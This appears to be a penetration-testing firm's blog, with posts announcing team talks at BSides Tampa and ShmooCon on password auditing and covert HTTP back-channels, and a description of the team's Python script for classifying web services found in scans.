Wednesday, February 12, 2014

Matt Wood & Nick Popovich at BSides Tampa

Sunera's penetration testing team members Matt Wood and Nick Popovich will both be presenting at this week's BSides Tampa security conference!

Nick Popovich is a Senior Consultant on the A&P team, and recently presented at the Shmoocon conference. His talk, Enterprise Active Directory Password Auditing, will be at 2:30 PM in Track 2. Here is the summary:

Most organizations enforce some form of password complexity requirements for their Active Directory (AD) users. They may be required by a compliance vertical, or they are attempting to employ an industry best practice. However, as security consultants, we have observed that not many organizations take the time to audit their Active Directory passwords, and therefore are unaware if their password policy is being enforced, or if it requires enhancement. This talk will detail the process and steps necessary to audit AD passwords using publicly available tools, and provide metrics that can be used to identify common weaknesses in passwords.

Matt Wood is a Manager on the A&P team, and is a veteran presenter from conferences such as BlackHat, Source, RSA, and OWASP. His presentation, What's lurking inside the "Real-Time Web"?, will be in Track 2 at 4:30 PM. The talk summary is below:

Increasingly "real-time" web applications are utilizing new protocols implemented by HTTP clients and servers such as WebSockets and SPDY. This presentation will demonstrate how these new functionalities permit attackers to more effectively, and more stealthily establish bidirectional communication with compromised hosts and in the process bypass outbound connection restrictions. We will cover the theory, historical techniques, defensive methodologies and new techniques throughout the presentation.

At the heart of these techniques is the ability to establish bidirectional communication channels on-top of HTTP connections; which is in stark contrast to the original intent of HTTP. These new channels defeat event the best DMZ traffic policies which generally disallow all connectivity outbound from the DMZ and only allow certain ports (80,443) inbound. Attackers have for many years known to abuse the trusted relationship between web servers (or any exposed service!) and perimeter firewalls (inbound ports). Generally these tricks come at a price and due to the way these applications functioned were something that could be detected by a vigilant security team.

We will discuss how attackers can easily bypass outbound firewall rules, the history of these methodologies, and common defensive techniques combating this threat. Furthermore, new techniques will be described that utilize "real-time" protocols; specifically, how can these new techniques create back-channels and simultaneously hide from those vigilant security teams, increase the throughput and reliability of an attacker’s "VPN", and arbitrarily direct traffic from the Internet into a DMZ environment.

Thursday, January 16, 2014

Sunera's Nick Popovich Speaking at ShmooCon 2014

Nick Popovich, senior consultant on the Sunera Attack & Penetration team, will be speaking at this week's ShmooCon 2014 conference.

Nick will be speaking about a recent research project which brought to light an information exposure vulnerability with a major US-based ISP.  What began with simple curiosity into the inner workings of an application led to the ability to list wireless network names and wireless encryption keys (among other things) armed only with a WAN IP address.

His research also shows that coordinated disclosure can go right.

Nick will be in the "Bring it On!" track on Saturday at 11 AM.

For the full abstract or more information, please see the link below, and look here for more information following the conference.

http://www.shmoocon.org/speakers#soapyservice

Friday, July 19, 2013

Enumerating web services with classify.webbies.py

classify.webbies.py is a Python script that captures and presents a high-level overview of all the web listeners within a defined scope. This allows the user to spot the more interesting web targets with efficiency and relative ease, regardless of the number of discovered web services. The script will enumerate the web listener to determine if the service is using SSL, the banner of the web service, the title of the web application, and if the web application has any interactive components such as forms and logins. Last, the script can also take a screenshot of the web application.

Throughout our engagements, we have often used Nessus or nmap to scan targets to find open ports and the possible services listening on those ports. However, in regards to web services, Nessus does not list if the service is http or https, and neither tool gives much information about the possible web applications running on the discovered ports. When confronted with thousands of web listeners, it can be a soul draining task to manually inspect each service. I myself find it especially frustrating when the bulk of web listeners merely redirect to either a previously inspected host or a site that is out of scope.

To automate the task of inspecting the discovered web listeners, I put together a Python script to classify them. At the time of writing, the accepted input types are Nessus nbe files, nmap gnmap files, or text files containing a list of hosts and ports in "host:port" format. With this input, the script will attempt to connect to each of the web listeners and determine several details:
  • http or https
  • web service banner
  • are there form elements
  • is a login present
The result will be printed out in CSV form for easy grep-fu and importation into other tools.

When enumerating the web service, the script will follow a predetermined number of redirects as long as the redirection stays within the defined scope. Additionally, the script is threaded to make classifying extremely fast, and it can work through proxychains. To top it off, it has a screen capture option that will render a PNG screenshot of each web application that responded with 200 HTTP status code. Unfortunately, the screen capture feature is not threaded and will take some time to complete. The original screen capture class was written by plumo and can be found here: http://webscraping.com/blog/Webpage-screenshots-with-webkit/. I have modified this version by adding a spoofed user-agent and disabling javascript.

We have found this python script to be useful and hope the community does as well.

The script can be downloaded from here:
https://sunera-ap-team.googlecode.com/git/classify_webbies/classify.webbies.py

Version 3.1 Change notes:

  • Removed QT. It was too buggy and unreliable for our uses. Instead, phantomjs is now used. 
  • Added -A, which analyzes the webbies and groups them according to similarity. This method generates graphs in the form of .ps files to be later converted into jpg,png, etc. 
  • Generates pickle files of webbies when given the Debug flag or Analyze option. These can be reloaded into ClassifyWebbies.py using the -P option to be reanalyzed or re-screenshot the hosts without crawling. 
  • Fixed a ton of random bugs.